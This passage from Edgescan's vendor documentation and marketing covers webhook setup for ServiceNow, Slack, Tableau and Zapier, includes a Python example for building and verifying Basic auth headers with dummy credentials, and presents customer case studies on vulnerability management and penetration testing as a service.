Retrieve your ServiceNow username and password. To use basic authentication, the `username:password` pair must be base64 encoded. If the username is `Patrick` and the password is `Security123`, encode them with:

```sh
echo -n "Patrick:Security123" | base64
```

The result is `UGF0cmljazpTZWN1cml0eTEyMw==`, so the authentication header is:

Authorization: Basic UGF0cmljazpTZWN1cml0eTEyMw==

As with any Basic header, this is reversible encoding, not a hash: whoever can read the saved Edgescan event can read the password. Create a dedicated integration user in ServiceNow that holds only the roles needed to insert into the chosen table, rather than using a person's account, and rotate its password on the same schedule as your other service credentials.

#### Setup ServiceNow Event Webhook

1. On Edgescan, navigate to the events page via Account/Settings -> Events.
2. Create a new event and give it an appropriate name.
3. In the first drop-down, select the event you want, e.g. "vulnerability opened".
4. Enable "Trigger a webhook".
5. Enter the URL for the required ServiceNow table endpoint, substituting your instance name for the placeholder. Usually:
   - Event: `https://<instance>.service-now.com/api/now/table/em_event`
   - ITSM Incident: `https://<instance>.service-now.com/api/now/table/incident`
   - Security Incident: `https://<instance>.service-now.com/api/now/table/sn_si_incident`
6. Ensure the HTTP method is POST.
7. Add the authentication header from the section above.
8. Select the payload that matches the endpoint entered:
   - JSON – ServiceNow: Event
   - JSON – ServiceNow: Incident
   - JSON – ServiceNow: Security Incident
9. The "Send a separate request for each item" checkbox creates a new record (for example a new Security Incident) for each vulnerability when checked; otherwise a single record is created containing the details of all matching vulnerabilities.
10. Save the event.

You can test that it is working with the Test -> Notification button in the top right.

### Slack

Setting up a workflow with Edgescan and Slack

With this integration, you can integrate Edgescan into your existing workflow by using a Slack channel webhook. In the following use case, a notification is sent to the selected channel when a vulnerability is opened in Edgescan on any asset and the risk is at least high.

Two main steps are needed to integrate Slack with Edgescan:

1. Create an incoming webhook for the selected channel.
2. Create the Edgescan event that triggers the notification.

#### Creating an incoming webhook for the selected Slack channel

1. Create a new Slack app in the workspace where you want to post messages.
2. From the Features page, toggle Activate incoming webhooks on.
3. Click Add new webhook to workspace at the bottom of the page.
4. Pick a channel that the app will post to, then click Authorise.
5. Use your incoming webhook URL to post a message.

Like the Teams URL, the Slack webhook URL is a bearer credential; keep it out of source control and regenerate it if it leaks.

#### Create the Edgescan event to trigger the notification

1. Navigate to the Events page and select + Add Event.
2. Give the event a name, e.g. "Vulnerability opened on any asset when risk is at least high".
3. Fill out the required conditions for the event.
4. Activate "Trigger a webhook".
5. Enter the incoming webhook URL and select the Slack payload.
6. Save and test the webhook.

Excerpt: Slack is a proprietary business communication platform developed by American software company Slack Technologies and now owned by Salesforce.
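The Freshdesk and ServiceNow sections above both build the same artefact: an HTTP Basic `Authorization` header whose value is `user:secret` in base64 (Freshdesk uses the API key as the user and the literal `X` as the password). The Python below is an added example, not Edgescan's, Freshdesk's or ServiceNow's code. It builds such a header, checks it against the two encoded values quoted on this page, shows concretely why the `-n` in `echo -n` matters, and includes the check a self-hosted webhook receiver should perform on the other end, using a constant-time comparison and rejecting malformed headers instead of raising. The function names are my own; the credential values are the dummies from the page.

```python
import base64
import binascii
import hmac


def basic_auth_header(user: str, secret: str) -> str:
    """Build the header line used by the Freshdesk and ServiceNow webhooks.

    RFC 7617: the value is base64(user ":" password), with no line breaks.
    Freshdesk: user = API key, secret = "X".  ServiceNow: user = username,
    secret = password.
    """
    if ":" in user:
        # RFC 7617 forbids a colon in the user-id; a receiver would split
        # the decoded pair at the wrong place.
        raise ValueError("user-id must not contain ':'")
    token = base64.b64encode(f"{user}:{secret}".encode("utf-8")).decode("ascii")
    return f"Authorization: Basic {token}"


def basic_auth_header_with_newline(user: str, secret: str) -> str:
    """What `echo` without `-n` produces: the trailing newline is encoded too,
    so the token differs from the correct one and the remote API rejects it."""
    token = base64.b64encode(f"{user}:{secret}\n".encode("utf-8")).decode("ascii")
    return f"Authorization: Basic {token}"


def verify_basic_auth(header_value: str, expected_user: str, expected_secret: str) -> bool:
    """Receiving side: validate a `Basic <token>` header value.

    Decodes strictly (bad alphabet or padding is a rejection, not an exception)
    and compares the whole user:secret pair in constant time, so response
    timing does not reveal how many leading characters of a guess were right.
    """
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return False
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return False
    user, sep, secret = decoded.partition(":")
    if not sep:
        return False
    presented = f"{user}:{secret}".encode("utf-8")
    expected = f"{expected_user}:{expected_secret}".encode("utf-8")
    # compare_digest returns False for different lengths without raising.
    return hmac.compare_digest(presented, expected)


if __name__ == "__main__":
    # Dummy credentials taken from the page; never paste real ones into a script.
    print(basic_auth_header("4p1t0k3n", "X"))               # Freshdesk form
    print(basic_auth_header("Patrick", "Security123"))      # ServiceNow form
    print(basic_auth_header_with_newline("4p1t0k3n", "X"))  # the echo-without--n mistake
    print(verify_basic_auth("Basic NHAxdDBrM246WA==", "4p1t0k3n", "X"))
    print(verify_basic_auth("Basic NHAxdDBrM246WAo=", "4p1t0k3n", "X"))
```

The receiver half is only relevant if you point an Edgescan event at an endpoint you run yourself (for instance while inspecting the payload shape before wiring up production); Freshdesk and ServiceNow perform the equivalent check on their side. The point of showing it is that decoding Basic auth is the easy part, and the comparison is where homegrown receivers usually go wrong.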
It offers many IRC-style features, including persistent chat rooms organized by topic, private groups, and direct messaging.

### Tableau

How to Connect to Edgescan's Web Data Connector

Edgescan's Web Data Connector (WDC) allows you to retrieve Asset, Assessment, and Vulnerability information in Tableau.

Requirements:

- Tableau
- Edgescan API key
- Edgescan Web Data Connector URL: https://connector.edgescan.com/tableau

To use Edgescan's WDC in Tableau, complete the following steps:

1. On the start page, in the Connect pane, click More Servers... > Web Data Connector.
2. Enter the Edgescan WDC URL (https://connector.edgescan.com/tableau) and press Enter.
3. Tableau loads the WDC page, where you input the required filter and your Edgescan API key.
4. Tableau interacts with the WDC and displays the data available for retrieval in the Data Source pane.
5. Select the table you want (Assets, Assessments, or Vulnerabilities) and click Update Now. This may take a minute or two depending on the amount of data.

The API key you enter is stored with the data source, so on Tableau Server anyone who can edit or refresh that data source can reuse it. Use a key belonging to an Edgescan user with the least access that still covers the data you need to report on.

Tableau Documentation – Use a WDC in Tableau Desktop
Tableau Documentation – Use a WDC in Tableau Server

Excerpt: Tableau can help anyone see and understand their data. Connect to almost any database, drag and drop to create visualizations, and share with a click.

### Zapier

How to Integrate Edgescan & Zapier.

#### Part One: Set up a webhook-triggered Zap

1. Go to My Zaps and click "Create Zap".
2. Search for "Webhook" and select "Catch Hook" as the Trigger Event.
3. Click "Continue".
4. Copy your new webhook's URL.

#### Part Two: Set up an Edgescan event to trigger that Zap

1. Go to your Events page on Edgescan and click "Add event".
2. In this example we'll trigger our Zap when an assessment completes, but feel free to set up whichever event you need to automate your workflow.
3. Once you've done that, click the "Trigger a webhook" toggle.
4. Paste in the URL that Zapier provided in the previous step. The rest of the values can be left unchanged.
5. Press the "Save" button.

Edgescan will now notify your Zap every time an assessment has completed.

#### Part Three: Add an action to your Zap to automate your workflow

We'll leave this part up to you! If you've had trouble along the way, feel free to shout@edgescan.com.

Excerpt: Zapier is a tool that helps you automate repetitive tasks between two or more apps, no code necessary. When an event happens in one app, Zapier can tell another app to perform a particular action.

## Case Studies

### A Firm Specializing in Mergers and Acquisitions

A global enterprise with a core strategy focused on acquiring smaller competitors enlists Edgescan to assess the security profile of new assets before they're accepted into the corporate network.

#### About the Client

One of the largest clinical research organizations (CROs) in the world is engaged in a long-term growth strategy focused on acquiring other businesses in the sector. This presents a rolling series of challenges for the internal security team: "How do we know what state the IT assets are in without performing due diligence on them prior to acquisition?" For the team, penetration testing every IP range and application scheduled to enter the parent network after a firm's acquisition was virtually impossible, and identifying all of these disparate assets and their owners to get visibility into their risk controls and metrics was in many cases unrealistic. So they called Edgescan.

#### About Edgescan

Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems, including web applications, websites, mobile apps, servers, firewalls, VPNs, and VoIP services.
A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that is highly accurate and virtually free of false positives.

#### Onboarding

Edgescan swiftly and seamlessly integrated with the client's information security apparatus to harden the attack surface of the core network. Now, when the client moves to make an acquisition, Edgescan onboards all assets associated with the target company (websites, mobile applications, VPNs and more) and begins the program of continuous attack surface management (ASM) for each asset before it enters the network.

#### Perimeter Defense

Edgescan provides authenticated assessment of attack-surface vulnerabilities on an ongoing basis for all web-facing assets under management. All of the vulnerabilities discovered are manually validated and risk-rated, helping the client focus on the issues that pose priority risk. The client can channel this validated vulnerability intelligence into their own security systems through the Edgescan API and operationalize it immediately, using Edgescan's insights to establish a more secure perimeter around their core network. When the client makes an acquisition, the web-facing assets associated with it are scrutinized for risk and vulnerabilities while still outside the perimeter, before they are accepted into the corporate network, so that the client's overall security posture is maintained.

#### Outcome

Edgescan's full-stack vulnerability management service has enabled the client to implement a defined and standardized process for accepting external assets into the secure network. This process has been streamlined and automated into the organization's existing security ecosystem, saving time and money. In this case, Edgescan's capabilities directly serve the major strategic goals of a global business, allowing leadership to execute a high-level plan while maintaining full command of their web-facing security posture.
### A Partnership to Safely Build a Justice System's Codebase

An Edgescan partner called in the vulnerability-management solution to provide another level of security for a coding project underway within a critical area of a correctional system.

#### About the Client

The governing board for a nation's youth justice system was engaged in a large-scale programming project to develop an online platform for managing the documents and other casework associated with individuals enrolled in the system. Given the nature of the information (criminal records, psychological evaluations, and other personal data for minors and individuals under 21 years of age), security was paramount. So the board's leadership approached an Edgescan partner, Securestorm (now known as Falanx Cyber), to safely manage the development process. Securestorm provided the initial layers of testing, but when a section of code reached a level of maturity it was moved to a cloud-based, web-facing user-training environment. The team at Securestorm identified Edgescan's vulnerability management solution as the ideal partner to handle risk management, information assurance, and operational security for this stage of the process.

#### Onboarding

The justice system's web-facing platform was configured with a representative set of accounts that were made accessible to Edgescan, so that new code blocks could be tested from a variety of angles through multiple theoretical end users. The solution then went to work scanning the web-facing applications on a schedule matched to the internal development team's sprint cycles, and the output reports were shared with the team for remediation as development continued.

#### Three Levels of Cooperative Security

Edgescan formed part of a three-level security testing and assurance model managed by Securestorm throughout the development process. As the code was written and committed within the Jenkins open-source toolset, Securestorm tested the additions against OWASP standards using a plugin. This allowed the development team to fix issues while still working on the code. When the code reached a level of maturity after clearing the initial security tests, it was moved to a cloud environment for user training and testing. Edgescan entered the equation here, when each piece of the client's platform became web-facing, to provide the second level of security testing. The rolling scans and penetration testing that define the Edgescan solution continually produced specific guidance about potentially problematic sections of code, so that developers could remediate them as development unfolded without disrupting or delaying each sprint. When the code reached its final level of maturity, it was moved to the production environment and subjected to a targeted government penetration test.

#### Outcome

Edgescan entered a partnership to help the youth justice system governing board's internal development team ensure the code they produced could be safely transitioned into a web-facing environment. Within Securestorm's management of the overall security protocol, the Edgescan solution played a decisive role in providing timely and targeted assessments that allowed the development team to address issues during sprints. The continual scans and testing allowed the internal team to make these security adjustments without delaying the larger process or product rollouts, and without the need for a major penetration test at the end of the development lifecycle. The developers were particularly impressed with the specificity of Edgescan's reports about the affected code, which enabled them to review the flagged security gaps and address the issues within the process rather than months later. The governing board's leadership was pleased that security issues and potential risks were addressed as part of the development lifecycle, and had high confidence that Edgescan's security-testing model had a significant positive impact on the developed application code. The Edgescan solution helped the governing board create a platform that allowed new coordination and knowledge-sharing within their workforce for the benefit of young people and the rehabilitation process, safeguarding underage citizens' highly sensitive information in a web-facing environment.

### A Major Health Insurance Provider

A midsize European nation's largest health-insurance provider tapped Edgescan to streamline its penetration-testing practices, with an eye on eliminating inefficiencies, automating their reporting processes, and gaining new visibility into security gaps in the attack surface.

#### About the Client

With roughly 2,500 employees across four branch offices and several sites, the company came to Edgescan with significant challenges around securing their systems, which include large-scale databases of sensitive patient records, financial data from hospitals and other facilities, and the firm's own proprietary information.
This insurance provider's internal security team sought a new solution for penetration testing, as its existing practices were burdened by a procurement process that created significant delays, consumed the security team's time, and left visibility gaps. The team also wanted to automate its processes: before enlisting Edgescan, each quarterly pentest required security analysts to manually collate the results and log the findings in a management platform for remediation. Reports from different providers arrived as PDFs, which made it harder for the insurance provider to compare metrics and build an efficient remediation pipeline.

#### About Edgescan

The Edgescan Platform features Penetration Testing as a Service (PTaaS), a hybrid solution that combines the breadth of automation with the depth of human assessment. As part of the platform's exposure-management SaaS, the solution is integrated with advanced vulnerability management and cyber analytics to automatically validate risk, then rate that risk against a suite of threat feeds to prioritize remediation. PTaaS can be used for web application security, APIs, cloud assets, network devices, and more.

#### Onboarding

The insurance provider's security team furnished Edgescan with account credentials and some key details about their systems. Then they sat back and watched as the platform was swiftly and seamlessly integrated into their operations. With the visibility this provided into the firm's wider network, Edgescan immediately began to monitor the full stack for any changes in the security environment and flag them in real time, including unapproved adjustments to user profiles, permissions, or protocols. Concurrently, the firm's internal team gained access to the Edgescan dashboard as a base of operations for their security approach.

#### The PTaaS Difference

The intelligence behind the hybrid penetration-testing solution comes from a team of security experts holding industry accreditations such as CREST, OSCP, and CEH. Their experience provides critical insight that dovetails with the breadth and scope of the platform's automated penetration testing services, which also yield an array of actionable analytics. This is where the Edgescan advantage comes into play. PTaaS helps organizations better manage security risks, mitigate data breaches, and assure business continuity. Delivered as a service to offer greater scale, agility, and risk awareness, this type of assessment is essential for maintaining compliance with industry regulations and building strong security frameworks.

#### Outcome

The firm's approach to penetration testing was immediately streamlined, replacing a cumbersome process of onboarding testers on quarterly cycles and manually assembling their findings with Edgescan's comprehensive service. The in-house security team gained "real visibility into previous gaps in [their] ability to secure systems" and large improvements in reporting as they moved from manually gathering data to a fully automated and integrated approach. This enabled the team to make use of detailed metrics as they built an effective remediation pipeline to address vulnerabilities as they were identified. Combined with dramatically increased visibility into the attack surface, this yielded a vastly improved mean time to remediate (MTTR). The insurance provider successfully met its security and compliance requirements and honored its commitment to protect customers' sensitive data.
### A U.S.-Based Telecom Manufacturer and Operator This firm sought vulnerability management as a service to maintain a secure posture across 450 web applications and 12,000+ IP servers, hardening the attack surface for internet and mobile infrastructure and safeguarding a vast pool of confidential information.   About the Client This telecommunications manufacturer and operator based in the United States manages 450 web applications and over 12,000 IP servers distributed across the globe. The security of these systems is of critical importance, with the continuity of mobile and internet communications at risk along with the firm’s own confidential information, the personal and financial data of its customers, and material considered sensitive by the U.S. federal government. The client seeks a continuous assessment of its global web-facing assets in order to detect current security issues and maintain a secure posture as threats evolve over time. The firm’s information security leadership prefers a list of actionable findings, free of false positives, which they can then assign for remediation in order of priority using the Edgescan Platform’s insights into which vulnerabilities carry the most critical risk.   About Edgescan Edgescan offers a continuous security testing and unified exposure management SaaS platform that manages thousands of assets across the globe for both enterprise and SME clients, helping them to continuously detect, prioritize, monitor, and fix security weaknesses for all web-facing and internal systems including web applications, websites, mobile apps, servers, firewalls, VPNs, or VoIP services. A team of analysts validates every vulnerability discovered on an assessment, creating a multi-step verification process for a solution that’s highly accurate and virtually free of false positives.   
Onboarding Edgescan swiftly and seamlessly integrated with the client’s information security apparatus to harden the attack surface of the core network, proceeding to validate each site and server for security and importance. The internal team was set up with an API plug-in to the Edgescan dashboard, where they could access the results and send flagged issues into their remediation process. Once an application is onboarded, technical assessment can commence and the application is subject to re-assessment on an ongoing basis.   Critical Security Priorities The Edgescan solution is a complete assessment of the global attack surface, with security gaps flagged according to the level of risk—from critical to informational—that each one poses to the firm’s systems. The Edgescan difference is a hybrid approach that combines the breadth of automation with the depth of human assessment, leaning on a battle-hardened team of security experts with industry accreditations such as CREST, OSCP, and CEH. Each potential issue is verified in a multi-step process to maximize accuracy and virtually eliminate false positives.   Outcome Within the first 7 days, Edgescan discovered, validated, and exposed 233 high-risk issues. All of the vulnerabilities discovered were manually confirmed, helping the client focus on issues which cause real risk. Edgescan monitored the remediation process to ensure flagged issues were properly resolved. Assessments of the attack surface then continued on both a scheduled and an ad-hoc basis. The client could request an assessment at any time to retest for vulnerabilities in any region of their sprawling web-facing assets. Edgescan’s multi-layered solution helped to secure the security posture of this global enterprise at a time where the challenge has only increased with the growth of cloud and social networking. 
For many firms, securing customer and enterprise data is a top priority, but in this case the security of worldwide communications networks is also of vital macroeconomic, social, and geopolitical importance. The Edgescan Platform played its part.

### A Healthcare Pharmaceutical Firm

In a highly regulated industry, maintaining a proper security posture while acquiring other firms and their portfolios of web-facing assets requires best-in-class vulnerability management.

#### About the Client

This multinational healthcare pharmaceutical firm operates in a highly regulated sector because of the security and compliance demands associated with safeguarding patient information and confidential business records, including clinical trial data and documentation for new products seeking patent approval. Proactive management of the web-facing systems supporting this data is of critical importance to the future success of the enterprise, and the company came to Edgescan seeking complete and integrated full-stack application security and vulnerability management. As a prime player in this industry, the firm regularly acquires smaller competitors and sought Edgescan’s help to ensure that no web-facing assets with substandard security controls would be accepted into the secure network following an acquisition. The enterprise’s leadership also sought full integration of the service into their existing information-security apparatus; a way to mitigate vulnerabilities in older legacy assets for which they lacked access to the source code; and on-demand reporting features they could leverage to maintain full compliance with government regulations.
#### Onboarding

Edgescan swiftly and seamlessly integrated with the client’s internal security operations to harden the attack surface of the core network. The platform immediately went to work identifying potential vulnerabilities and flagging them in the Edgescan dashboard for the internal security team to review. When complex security challenges arose, the Edgescan team helped the client develop bespoke solutions. When the client moved to make an acquisition, Edgescan onboarded all assets associated with the target company (websites, mobile applications, VPNs and more) to begin the program of continuous attack-surface management (ASM) for each asset before it entered the network.

#### Custom-tailored Solutions

The client’s information-security leadership had specific needs tied to the regulatory demands of the industry and the nature of their attack surface. When Edgescan’s solution identified vulnerabilities in some older legacy systems that the firm was operating, the internal security team lacked access to the source code necessary to fix them. Edgescan supplied automatic Web Application Firewall (WAF) rule generation so that they could virtually patch those security gaps: the WAF blocks attempts to exploit each flaw, which remains in the code until it can be fixed at source. The firm also had significant requirements around on-demand testing to supplement Edgescan’s rolling vulnerability assessments.
They leveraged ad-hoc scans and penetration testing as required to be sure a previously discovered vulnerability had been fixed properly. This on-demand reporting capability is vital given the frequency of security audits in this industry, and this agile posture was key to Edgescan’s role in the firm’s ISO/IEC 27001:2013 compliance efforts. The enterprise sought a solution that could incorporate all this into a larger approach facilitating the speedy and safe onboarding of new web-facing applications following the acquisition of market competitors.

#### Outcome

Edgescan’s full-stack vulnerability management helped this healthcare pharmaceutical enterprise harden its attack surface and maintain compliance in a highly regulated industry where acquiring smaller competitors is core to the firm’s strategy. The platform enabled the firm’s internal security team to swiftly identify and remediate vulnerabilities thanks to Edgescan’s comprehensive integration capabilities, and they leveraged Edgescan’s bespoke solutions to address specific challenges created by legacy systems and a demanding regulatory framework. The platform gave the firm confidence to pursue its acquisitions strategy knowing that a defined process was in place for accepting unvetted assets into the core secure network, that this process was streamlined and automated into the organization’s existing security ecosystem, and that it aligned with the continuous-improvement philosophy of the global information security program. This approach to providing deep vulnerability intelligence on all new digital assets acquired by the enterprise ultimately saves time and money while allowing the firm to maintain full control over its web-facing security posture.

### An Online Gaming Company

With 100+ web-facing applications in deployment, this firm required continuous, authenticated assessment of a sprawling global attack surface.
#### About the Client

This enterprise carries a high level of threat exposure by nature: its products and services are delivered entirely online in a rolling user experience via dozens of web-facing applications that together make for a varied and intricate attack surface. The client’s internal security team sought a vulnerability management service that would yield a list of actionable findings, free of false positives, which they could assign and remedy internally. Once security gaps were addressed, the firm required regular assessment of the adjusted security posture as well as retest-on-demand capability. The security team also sought a specific authenticated assessment that could simulate an attacker with valid credentials attempting a security breach on both desktop and mobile web applications.

#### About Edgescan

With Penetration Testing as a Service (PTaaS), Edgescan probes and challenges the attack surface of the client’s assets with both the breadth of automation and the focused depth of expert human testers.

#### Onboarding

The client was set up with API and Jira plug-ins in order to directly integrate Edgescan’s verified vulnerability data into their own systems, accessed through a dashboard that doubles as a base of operations for their updated security plan.
Edgescan then went to work, rating each web-facing application for vulnerability and systemic importance to deliver risk-rated findings on where the firm’s most critical security gaps lay, at which point the internal team could begin remediating those threats on a priority basis.

#### Test and Retest

With this challenging exposure profile, the attack surface requires constant monitoring with authenticated vulnerability assessment for the 100+ web applications under management. This includes Penetration Testing as a Service (PTaaS), a hybrid solution that combines the breadth of automation with the depth of human assessment from a battle-hardened team of security experts with industry accreditations such as CREST, OSCP, and CEH. Their deep experience provides critical insight that dovetails with the breadth and scope of the platform’s automated testing. Integrated with Edgescan’s vulnerability management service, this system validates each risk and then rates those threats against a suite of risk databases to prioritize remediation and ensure critical exposures are addressed first. Assessments occur on both a scheduled and an ad-hoc basis, as required by the client.

#### Outcome

Within the first seven days, Edgescan discovered and validated 55 high-risk vulnerabilities, publishing them in the dashboard for the client’s review. The internal security team then addressed those security gaps over the following months, and in each case Edgescan verified the effectiveness of the firm’s remediation. With a new security posture in place and continuous re-assessment of the web-facing assets underway, the client could have new confidence in the hardiness of the expansive attack surface and could request a re-assessment of any asset at any time to maintain that posture.
### A Global Banking Institution Seeks Greater API Security

The growth of open banking and PSD2 compliance has changed the face of API security for banks. The client sought help to reduce API security risk efficiently and to maintain more accurate reporting.

#### About the Client

This global banking institution faced issues with managing and deploying API services to support the rapid expansion and diversification of its business. Open banking, in which financial institutions grant third-party service providers access to customers’ personal information and transaction data to connect their accounts across multiple institutions, relies heavily on APIs. This paradigm is driving major innovation in the financial-services industry, but the uncontrolled deployment of APIs can give rise to security blind spots and vulnerable endpoints that can be exploited by bad actors. According to the 2024 Data Breach Investigations Report (DBIR) by Verizon, 90% of web-application attacks target APIs. The firm’s information-security leadership found themselves unable to scope how many APIs had been deployed, and some of those pathways could not be maintained and regularly assessed for vulnerabilities. As a direct route to sensitive business and consumer data, APIs are also a particular focus of the European Union’s Payment Services Directive 2 (PSD2), with which the firm sought to come into full and proper compliance.

#### About Edgescan

Edgescan’s API Security Testing enables firms to identify API vulnerabilities across their known network of web-facing assets. The platform also discovers rogue APIs across your cloud providers (AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI), tracks them, and flags issues in the Edgescan dashboard for the internal security team’s review and potential remediation.

#### The API Challenge

90% of web application attacks target APIs, and deployment data from Edgescan customers reveals a 320% rise in API vulnerabilities in 2022, a severe warning to organizations of all types about the scale of this challenge. It can be difficult to discover unknown or forgotten APIs: they are “headless”, with no website or other obvious indicator that they exist, and many are only discoverable if you interact with the endpoint in the correct manner. If deployed APIs cannot easily be found and tracked, they cannot be secured. Using multi-layer probing technology, the Edgescan API discovery engine uses asynchronous port scanning to identify and then monitor network changes. It automatically discovers active API endpoints across the entire attack surface and flags them for review and assessment.

#### Outcome

Edgescan’s comprehensive API security testing helped discover hidden and rogue APIs across the client’s web-facing assets and cloud providers. The multi-step verification process applied to each potential issue ensured that the threat information received by the internal security team was free of false positives and risk-rated. They could then proceed with their remediation approach in confidence that their order of operations was optimized for efficiency.
By helping to secure the bank’s network of APIs, the Edgescan Platform hardened a crucial element of the institution’s attack surface and provided continual monitoring of one of the most commonly exploited security gaps today. The enterprise could now promise customers top-notch security for their personal and financial information, and the internal security team could better ensure the firm’s security posture was in full compliance with government rules and regulations on transaction data.

### A Major Multinational Media and Entertainment Company

Edgescan demonstrates that its Web Application Security Testing solution can operate with unrivaled precision at massive scale.

#### About the Client

The enterprise is a leading diversified global entertainment and media conglomerate with subsidiaries and affiliates spread across content production and distribution, live experiences, and assorted international holdings. This client was seeking a new solution to scale its Application Security Testing (AST) program to cover 5,000 web applications across all of its corporate entities, after existing solutions simply could not scale to the required level without sacrificing quality.

#### Onboarding

Edgescan quickly established a baseline security posture for all 5,000 web applications across all business units.
Within 24 hours, 500 websites were onboarded, a process that can take weeks or months with other solutions. Within one month, Edgescan demonstrated that it could provide threat-detection accuracy at massive scale, and it continued to do so as the client enterprise steadily grew and expanded its portfolio of applications requiring scanning and monitoring. The solution continued to provide accuracy under increased load; in fact, Edgescan’s capacity exceeded the input requirements that this major multinational firm placed on the platform. Previously, the client had been unable to find a solution that could handle the extremely large volume of throughput its business required.

#### Continuous Assessment

Following the successful implementation of the Web Application Security Testing solution, the client chose to expand its Edgescan Platform service to include Penetration Testing as a Service (PTaaS). With a security baseline established, the enterprise’s internal security team wanted to probe its vulnerabilities from all angles on a rolling basis. Again because of the size of the firm, it had struggled to secure penetration testing that was reliable at the required scale, even when it engaged other third-party contractors. Armed with intelligence from the DAST solution, Edgescan began to rank each of the enterprise’s systems in coordination with the client, promoting those of core importance to the organization, and those that presented critical risk, as priority targets for penetration testing. Because the testing was integrated with vulnerability assessment on one centralized platform, the enterprise could scale pen testing as required with maximal precision.

#### Outcome

Within 24 hours, Edgescan was able to onboard 500 websites, and within a month the solution demonstrated it could provide accuracy across 5,000 web applications.
Previously, without Edgescan, the client was assigning eight members of its security team to validate automated results. With Edgescan, it now assigns just two and deploys the remaining six staff to strategic activities. With the success of the Web Application Security Testing solution, the firm sought out Penetration Testing as a Service, and the Edgescan Platform was able to deliver this additional solution at 50% of the cost of the client’s previous pen-testing services without sacrificing any coverage or accuracy. Pen tests by the firm’s internal teams had typically compromised their applications after four hours of testing; following Edgescan’s intervention, and with the team’s ability to find and fix vulnerabilities more efficiently, a typical pen test now requires over 48 hours to compromise those same applications. This enterprise has the budget and security acumen to test all manner of security tools, from established services to the newest solutions. They can work with anyone, and each year the Edgescan Platform is placed in a bake-off against competitors vying to provide services to this client. In each of the past five years, Edgescan has conclusively won the bake-off and continues to hold a strategic and trusted role in the overall cyber security program of this sprawling international enterprise.

### A Multinational Software Firm Specializing in Customer Experience Management

A young company brought Edgescan aboard to build security into its systems from the ground up, embedding best practices in its operations.

#### About the Client

From offices in the U.K., Ireland, and Poland, the enterprise helps businesses around the world capture and analyze customer feedback. Their client companies hail from a range of sectors but share the goal of building their businesses with customer experience at the center.
The firm’s services help their clients foster customer loyalty, improve customer satisfaction, remove hurdles from the customer journey, and enhance operational efficiency.

#### Onboarding

The firm chose to implement Edgescan’s continuous vulnerability assessments and penetration testing on the basis of its “strong reputation and the combination of both high-tech capability and personal expertise, which gives an extra level of comfort that nothing is slipping through the gaps.” The client described the Edgescan adoption and integration process as “seamless,” noting that “the service can be deployed across the IT infrastructure almost in real time.”

#### Secure Growth

“As new business opportunities come to us, we are seeing growing requirements and expectations in terms of information security and vulnerability assessments,” the client reports. “Having Edgescan in place covers a lot of our bases in terms of being able to meet these requirements and satisfy the requests from new and existing customers alike.” The firm’s approach includes “a healthy level of paranoia” around information security, and before partnering with Edgescan they had recently hired a Chief Information Security Officer to offer “deep domain expertise” to their clients.
Still, they knew that no one person can monitor their systems 24/7, and Edgescan’s automated approach offered that capability, with an added layer of ongoing assurance from systematic penetration testing.

#### Outcome

With Edgescan’s round-the-clock automated monitoring fused with the enterprise’s own internal expertise, its leadership now regards the firm’s level of information security as an essential benefit for its customers and a key differentiator from its competitors. Continuous vulnerability assessments through the Edgescan platform “have made it a lot easier for us to identify any gaps or concerns in our product offering,” they report, “and the amount of detail provided when a vulnerability is detected makes it easy for us to address them quickly. Plus, we can sleep more easily in the knowledge that we are doing our utmost to ensure the data of our customers and their customers is protected!”

## Whitepapers

### The Smart Vulnerability Management War Room

### Vulnerability Management Maturity Model

### A Hybrid Model for Vulnerability Management

### Edgescan Analysis of 2021 DBIR Report

### Smart Vulnerability Management for Enterprise

### Security Tools and Vendor Consolidation

### Single Full-Stack Vulnerability Management Solution

### Resilient to Ransomware

## Webinars

### Problem Based Cyber Security Training, Why It Matters

Our latest webinar is a Q&A with Eoin Keary and Jim Manico on why problem-based training matters. This is not to be missed if you want to get the most out of your penetration testing, SAST, ASM, and risk-based assessment.

### DevOps Best Practices Webinar

Eoin and Jim give an introduction to DevOps and DevSecOps with a CI/CD focus.

### OWASP Top 10 Webinar

Eoin and Jim sit down to take a look at the OWASP Top 10 and how they affect organizations. The OWASP Top 10 is a standard awareness document for web developers and web application security professionals.
It represents a broad consensus about the most critical security risks to web applications. As software developers author the code that makes up a web application, they need to embrace and practice secure coding techniques. This training provides defensive instruction on the OWASP Top Ten to aid developers in authoring secure software.

- A01:2021-Broken Access Control
- A02:2021-Cryptographic Failures
- A03:2021-Injection
- A04:2021-Insecure Design
- A05:2021-Security Misconfiguration
- A06:2021-Vulnerable and Outdated Components
- A07:2021-Identification and Authentication Failures
- A08:2021-Software and Data Integrity Failures
- A09:2021-Security Logging and Monitoring Failures
- A10:2021-Server-Side Request Forgery

### Irish Times | Cyber Security Special

### DBIR 2021 Fireside

### Open And Secure Approach To Public Health Apps With NearForm And Edgescan

Join NearForm’s Conor O’Neill, Edgescan’s Rahim Jina and Mark Cummins from TUDublin as they discuss how to secure open source code used in public health apps.
### Edgescan Vulnerability Landscape 2021 Webinar

Eoin Keary, Rahim Jina, and Dan Raywood discuss the findings from the Edgescan 2021 Stats Report.

### VALIDATION – Mr Vulnerability, False Positive & Validator

Learn about vulnerability management validation, false positives and false negatives across all aspects of Edgescan’s service, from coverage of assessments to full-stack validation to safe testing in production. The Edgescan Heroes & Villains are a series of characters representing cybersecurity and infosec challenges which impact us all. This webinar is the second in the series and introduces Validator, Mr Vulnerability and False Positive.

### CONTINUITY: Scale & Cash Burn

Let’s talk about continuous, on-demand, all-you-can-eat coverage: how to scale from one application or endpoint to thousands. Edgescan delivers scale, volume and frequency without accuracy suffering, and continuous, validated vulnerability intelligence within budget. The Edgescan Heroes & Villains are a series of characters representing cybersecurity and infosec challenges which impact us all. This webinar is the third in the series and introduces Infinity, Scale and Cash Burn.

### Edgescan TUDublin Webinar 27th April 2020

Student webinar including presentations from Edgescan experts:

- Ciaran – Working in Edgescan (00:00)
- Dearbhail – 2020 Edgescan Stats Report Insights (00:22)
- Conor – HTB Demo (00:41)

## Posts

### The Hidden Cost of Slow Penetration Testing: From Identification to Assessment

